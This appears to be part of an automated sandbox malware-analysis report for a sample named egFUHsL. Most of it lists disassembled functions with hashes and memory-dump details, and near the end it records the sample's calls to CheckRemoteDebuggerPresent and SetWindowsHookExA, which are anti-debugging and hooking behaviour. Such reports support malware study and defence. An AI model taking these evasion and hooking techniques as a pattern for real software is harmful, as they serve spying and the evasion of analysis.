                                                                                        • Opcode Fuzzy Hash: fd93a7b13580c34117085d6d602bbc68556141cc70697e0a69d61c558ebb0302
                                                                                        • Instruction Fuzzy Hash: 8A210775B24348DFEB04DF10D8C4B16BB65EB85314F34C5A9D80D4B256C3BAD896CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F6DA1 Relevance: .1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 662441a185df58bc811a55ae0603beb150d850697b90f21ca020fe45ece8b56a
                                                                                        • Instruction ID: da485313c1ecfbc18026f58f6514ff26c67f11f8209f846f25736c1d06e4b409
                                                                                        • Opcode Fuzzy Hash: 662441a185df58bc811a55ae0603beb150d850697b90f21ca020fe45ece8b56a
                                                                                        • Instruction Fuzzy Hash: D5210636724205DFD7106F64C828B79B3A2EB85785F18C17AD245CF384DB368C12DB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FE0C1 Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8aeebef35272ccddcf692cc5dd3ce5ac6aa46c4436291a2917cedcca79e52497
                                                                                        • Instruction ID: fc68e27eb39f897b1ced844fb581ad5a3cdb70b1d6a1c726b962e4ca5686a171
                                                                                        • Opcode Fuzzy Hash: 8aeebef35272ccddcf692cc5dd3ce5ac6aa46c4436291a2917cedcca79e52497
                                                                                        • Instruction Fuzzy Hash: 3111B930765609DFEF268F15D814B7AB752AB81B50F27817AE20A6B2B0C7F58C518701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F99D0 Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4bad6874aef6ce664276e78a7706d4024493d2977ffbd84816bd5ac708e1ffcb
                                                                                        • Instruction ID: bd2ce975f8371141661549edb56dea97ddebc3e16df141416a120ad6b5b00e9c
                                                                                        • Opcode Fuzzy Hash: 4bad6874aef6ce664276e78a7706d4024493d2977ffbd84816bd5ac708e1ffcb
                                                                                        • Instruction Fuzzy Hash: 72218E74A10908DFC704CF5AE684999BBF1FF89310B6280D9D4489B365DB71EE60EB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0026D28F Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371680445.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_26d000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction ID: dddae5e8d82c864a1a1a395ee4c77191e8b05433217f5f59d6d6adcc859f3178
                                                                                        • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction Fuzzy Hash: 11118B79A04284DFDB11CF10D5C4B19BFA1FB84714F24C6A9D8494B756C33AD8AACFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0B38 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d53462d80946af31ef2562d07bcb579f351f9d9431d90a2a730d6ecc13425b1b
                                                                                        • Instruction ID: 6901a33961ded0fca257f30f410931be1c390868be88bd191568051e6ecad513
                                                                                        • Opcode Fuzzy Hash: d53462d80946af31ef2562d07bcb579f351f9d9431d90a2a730d6ecc13425b1b
                                                                                        • Instruction Fuzzy Hash: BE01D6703153405BD749A7B958657AFBBAAAFC9340F08847BD10CC2293CEB8580187E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F41EE Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72b6dfc1f15720bbac9cdab373d17a267bab8353fbf146b8912cbb5d7f3ff9aa
                                                                                        • Instruction ID: 4562c9835b5ab352983a3e4b51df79bed9db128941fee85dc4899b1167d65e41
                                                                                        • Opcode Fuzzy Hash: 72b6dfc1f15720bbac9cdab373d17a267bab8353fbf146b8912cbb5d7f3ff9aa
                                                                                        • Instruction Fuzzy Hash: C70121307412148FE754DB388C51BAA76E2AF88780F2540B8E509AB3D5CE75EC418F94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0518 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c7e995fdad9d795c549c1a2c08dc98eb61e723c62ab8c5f9d43fb17fee8572e
                                                                                        • Instruction ID: 44084550d1c7da98aee73bd1903ca1dff1b0544bf06fca3237fa919db8eb0d17
                                                                                        • Opcode Fuzzy Hash: 8c7e995fdad9d795c549c1a2c08dc98eb61e723c62ab8c5f9d43fb17fee8572e
                                                                                        • Instruction Fuzzy Hash: FDF0C27032020497D74CA7B998597AFB69AAFC8380F04893AE20DC2256CEB44C118BE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F646C Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 98e7c911b758f21a6b28fee96b60784b5002143208cb52a5ca4c953c0f04c875
                                                                                        • Instruction ID: 46dc84a7d07835a1fcb2a4edec94c855aabbe2fe3c3409522ed92f987504e4fd
                                                                                        • Opcode Fuzzy Hash: 98e7c911b758f21a6b28fee96b60784b5002143208cb52a5ca4c953c0f04c875
                                                                                        • Instruction Fuzzy Hash: 67F02731320704D7D318F725D8949AFFB42EFD03A03448929E5094B301CF705D0ACAA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F6470 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 54be04add33bb2f2167cdfd14ceebafb65f1d4ef6d6c638956f693034436bcd9
                                                                                        • Instruction ID: b0e3a801c5e570c3245c6144fa10a192600de3efb0054d7efea7a7e6a7141953
                                                                                        • Opcode Fuzzy Hash: 54be04add33bb2f2167cdfd14ceebafb65f1d4ef6d6c638956f693034436bcd9
                                                                                        • Instruction Fuzzy Hash: 1AF0EC3132071897C718F725DC959AFFB56EFD43A07848829E9094B311CE715D0689D4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FA094 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2077d1de05e4d43b358ff5aa14e2b0033d9cb830a86d77e03d5909ac53d28f6d
                                                                                        • Instruction ID: 097f2981f6295045318c1f80859624bfdd703698630efa1302d2b7bfebae45ae
                                                                                        • Opcode Fuzzy Hash: 2077d1de05e4d43b358ff5aa14e2b0033d9cb830a86d77e03d5909ac53d28f6d
                                                                                        • Instruction Fuzzy Hash: 32F0E778E16288EFCF11CFA8D84199CFBB0AF09740F24016AE945A7352DB315966DF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F9228 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 987027fbf8e1dece238646dc1c8a783575936a2f60fbf9bb8d98352a585906c8
                                                                                        • Instruction ID: a8395994fe1508c00e45c8af059ce9ddf01325b2f5e29b0ec6587ef245403e74
                                                                                        • Opcode Fuzzy Hash: 987027fbf8e1dece238646dc1c8a783575936a2f60fbf9bb8d98352a585906c8
                                                                                        • Instruction Fuzzy Hash: 39F02B317053804FE3559B54D8587A5BFA6EB42348F5882BFD448CF286C73A8C81C741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F9238 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e90baf11066081e1e9d33a1cc66f3c04338d826a28d9696750209538d36f416c
                                                                                        • Instruction ID: 911ba08d32ebc15135d80c8f28e8df9c9ac86750841fe21bd7f476cc0e0a231a
                                                                                        • Opcode Fuzzy Hash: e90baf11066081e1e9d33a1cc66f3c04338d826a28d9696750209538d36f416c
                                                                                        • Instruction Fuzzy Hash: 28F0E2303113149FE304AA54D4987A6BB96EB81349F688376D5088F286D73A8C82C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0D50 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c665c2e93c0ce2becb15f182ec110f5b4f6183f055a94c2b6bbd8d0c619f54b
                                                                                        • Instruction ID: 34dbe4f9248260164ac33b476529f590fd98e0ec69e5fc5e49933c08b2008c12
                                                                                        • Opcode Fuzzy Hash: 2c665c2e93c0ce2becb15f182ec110f5b4f6183f055a94c2b6bbd8d0c619f54b
                                                                                        • Instruction Fuzzy Hash: 18F0E56126E3899ECB2707E06CA5A317F24DB537C0F4840EFE2469F0F7D2919522E612
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FCAEF Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c3f461f8673d789fa0ac70b5b3ff9b6d6dd0512629038f56c010149b6b0cc55
                                                                                        • Instruction ID: c03adbd00a2d6cf606d9a142f8cfc219393df44277bf2b7c7eb88c9c495635ec
                                                                                        • Opcode Fuzzy Hash: 2c3f461f8673d789fa0ac70b5b3ff9b6d6dd0512629038f56c010149b6b0cc55
                                                                                        • Instruction Fuzzy Hash: 6AE09A3A960249EFCB119F80CD09EB8BBB2BF04740F2581A2F2054B0B2D3B58821EB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FA126 Relevance: .0, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a78955869e75e5466683b1c306b9df1fd3607dadb7790ea2b4211da001cf945
                                                                                        • Instruction ID: 8a6225081494eafae2be1540caeece02d16da67a442db09cc6a527c50408f703
                                                                                        • Opcode Fuzzy Hash: 9a78955869e75e5466683b1c306b9df1fd3607dadb7790ea2b4211da001cf945
                                                                                        • Instruction Fuzzy Hash: 57D05EB2A2401C8F8B00DAA4E8444FDF734EB4A351B114436C60BE3110CB711925E605
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FD9E4 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d65b7b3c311051ac7391dd3905afd3bf1a4d17d8c007e87b57b5efd5751aeebe
                                                                                        • Instruction ID: 39eb43c34705ba948b55fdb28585dea63a3795a5e796545cddf866c0b59931d1
                                                                                        • Opcode Fuzzy Hash: d65b7b3c311051ac7391dd3905afd3bf1a4d17d8c007e87b57b5efd5751aeebe
                                                                                        • Instruction Fuzzy Hash: 6BE07574D19228DFCB50DF94E980BADB7F6BB08344F105195E909A7305D7709E94CF45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FAAB0 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45e065d096beb757af6c6177d35d91fe450d686057be3d82dbc2c06637683afb
                                                                                        • Instruction ID: 4b41ad65ee430a0e36e09c1243e57b58ab9388e23730084d8ae2ea197927fff9
                                                                                        • Opcode Fuzzy Hash: 45e065d096beb757af6c6177d35d91fe450d686057be3d82dbc2c06637683afb
                                                                                        • Instruction Fuzzy Hash: E2D05E7046920CD7E301AB60DA18A79F27CAB06341F145578C50E131508BB08E1CF652
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0B00 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c155bd62c2d8c32bbf1c48b021b1e5eb1a78bc44648bccbf7f6eb73e1932bf37
                                                                                        • Instruction ID: 17916ba49cb9ce525834807a91d950e189c6a5f7f7d49be018b42cbed08071d8
                                                                                        • Opcode Fuzzy Hash: c155bd62c2d8c32bbf1c48b021b1e5eb1a78bc44648bccbf7f6eb73e1932bf37
                                                                                        • Instruction Fuzzy Hash: 85D0123137072D17156933F4181247D61494FC25D8781007DD20F9B2C2CF155D6307E7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0D18 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aaac27ea621ad4b0e007a3227a5e9c25c1fc039e8e963fbf56aefa033f9b2c8b
                                                                                        • Instruction ID: 57b184a1d0ff3657fcce37f286c18aab1205564def182d2acbdf9ca65c897e48
                                                                                        • Opcode Fuzzy Hash: aaac27ea621ad4b0e007a3227a5e9c25c1fc039e8e963fbf56aefa033f9b2c8b
                                                                                        • Instruction Fuzzy Hash: E9D0A9342A4309AACA2A1A90BD46B32B66CA714BC0F4040B7A2099E0E2CAE2E8209411
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FAA0E Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                        • Instruction ID: 3204d2ead2c57a29f6d57bc1dbad178432df0ae6504330aa966478db5d5813cc
                                                                                        • Opcode Fuzzy Hash: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                        • Instruction Fuzzy Hash: 9CD06C78A10128CFDB60CB24C880F99F7B1AB89358F1080D9880DA3302C732AE82CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FFF08 Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce912e6d8fb3d6283d015d83220049842da1a5eb4096fd30800c57a93da7dcb6
                                                                                        • Instruction ID: 6b91746ca840566bc09e06c53fe8c029403687f42b15385574bcd29471b5e531
                                                                                        • Opcode Fuzzy Hash: ce912e6d8fb3d6283d015d83220049842da1a5eb4096fd30800c57a93da7dcb6
                                                                                        • Instruction Fuzzy Hash: 2EC08C30029A08C7E2202BE0BE1D33476686F8131AF80023AD14D004B08AA09420DEA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FA548 Relevance: .0, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: acdca281f0d5ac73a78e7ab57757a2cd3bd7a704b84977ef48ba41020900cac2
                                                                                        • Instruction ID: 83ab623a7dd7b5179bdcd942a50ba19abb1d2c201a5557cddad2ebd84eaa44d4
                                                                                        • Opcode Fuzzy Hash: acdca281f0d5ac73a78e7ab57757a2cd3bd7a704b84977ef48ba41020900cac2
                                                                                        • Instruction Fuzzy Hash: D2D0CAB0E28208CFCB00CF84C5486FDF7B4BB08300F208029C21AA2240C3B46A02DF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.1%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:7
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 20834 1c5348 20835 1c538c CheckRemoteDebuggerPresent 20834->20835 20836 1c53ce 20835->20836 20837 6da677 20839 6da55d 20837->20839 20838 6da58e SetWindowsHookExA 20840 6da5c2 20838->20840 20839->20838 20839->20840

                                                                                        Executed Functions

                                                                                        Function 006DA677 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1300 6da677-6da684 1303 6da686-6da68e 1300->1303 1304 6da620 1300->1304 1306 6da690-6da693 1303->1306 1305 6da621-6da622 1304->1305 1307 6da5c5 1305->1307 1308 6da623-6da63e 1305->1308 1309 6da6a9-6da6ac 1306->1309 1310 6da695-6da6a4 call 6d996c 1306->1310 1312 6da55d-6da582 1307->1312 1313 6da5c7 1307->1313 1308->1303 1335 6da640-6da641 1308->1335 1314 6da6ae-6da6b2 1309->1314 1315 6da6b7-6da6ba 1309->1315 1310->1309 1323 6da58e-6da5c0 SetWindowsHookExA 1312->1323 1324 6da584-6da58c 1312->1324 1313->1305 1318 6da5c8 1313->1318 1314->1315 1319 6da6bc-6da6c6 call 6d9904 1315->1319 1320 6da6cb-6da6cd 1315->1320 1328 6da5c9-6da5e9 1318->1328 1319->1320 1326 6da6cf 1320->1326 1327 6da6d4-6da6d7 1320->1327 1323->1328 1330 6da5c2 1323->1330 1324->1323 1326->1327 1327->1306 1331 6da6d9-6da6db 1327->1331 1330->1318 1336 6da5fb-6da61b call 6d5d94 1335->1336 1337 6da642-6da674 call 6d5da4 call 6d9738 1335->1337 1336->1304
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.718445263.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_6d0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f2c29c3c62a4f982273c9accb4ae9075068d63de5ab64ae14ade3b625e41bbb2
                                                                                        • Instruction ID: bb3f9101a55358deb7913af889511672830986d7f80b84536d150df02cc6c9aa
                                                                                        • Opcode Fuzzy Hash: f2c29c3c62a4f982273c9accb4ae9075068d63de5ab64ae14ade3b625e41bbb2
                                                                                        • Instruction Fuzzy Hash: 9D412471A08244CFCB20DFA8C4557EABBB2EF95310F14886ED04A9B341CB35D805CB56
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001C5340 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1345 1c5340-1c53cc CheckRemoteDebuggerPresent 1347 1c53ce-1c53d4 1345->1347 1348 1c53d5-1c5410 1345->1348 1347->1348
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C53BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.718051954.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_1c0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3662101638-0
                                                                                        • Opcode ID: 41a01a5f2188499df2531dc92dd469e9e85cd572217ab5e8762ab78898d82f2a
                                                                                        • Instruction ID: 159c488f0746f58abf315cde03f080a824cfe48a7e00fbb70990c31575089c4b
                                                                                        • Opcode Fuzzy Hash: 41a01a5f2188499df2531dc92dd469e9e85cd572217ab5e8762ab78898d82f2a
                                                                                        • Instruction Fuzzy Hash: 1B2148B1800259CFDB10CFAAD884BEEBBF4AF89320F24841AD455B7350D778AA44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001C5348 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1351 1c5348-1c53cc CheckRemoteDebuggerPresent 1353 1c53ce-1c53d4 1351->1353 1354 1c53d5-1c5410 1351->1354 1353->1354
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C53BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.718051954.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_1c0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3662101638-0
                                                                                        • Opcode ID: 6551671381e563c5bc272e192a175ab3c0a31fee9676d57615c27ac21e7195fc
                                                                                        • Instruction ID: 8be12d3ebca301e862fe218c227f14960a93b8ad48f596134138311cda72d16c
                                                                                        • Opcode Fuzzy Hash: 6551671381e563c5bc272e192a175ab3c0a31fee9676d57615c27ac21e7195fc
                                                                                        • Instruction Fuzzy Hash: 002128B1800259CFDB00CF9AD884BEEBBF4AF49324F24845AD455A7250D778AA44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 006DA538 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1357 6da538-6da582 1359 6da58e-6da5c0 SetWindowsHookExA 1357->1359 1360 6da584-6da58c 1357->1360 1361 6da5c9-6da5e9 1359->1361 1362 6da5c2-6da5c8 1359->1362 1360->1359 1362->1361
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 006DA5B3
                                                                                        Memory Dump Source
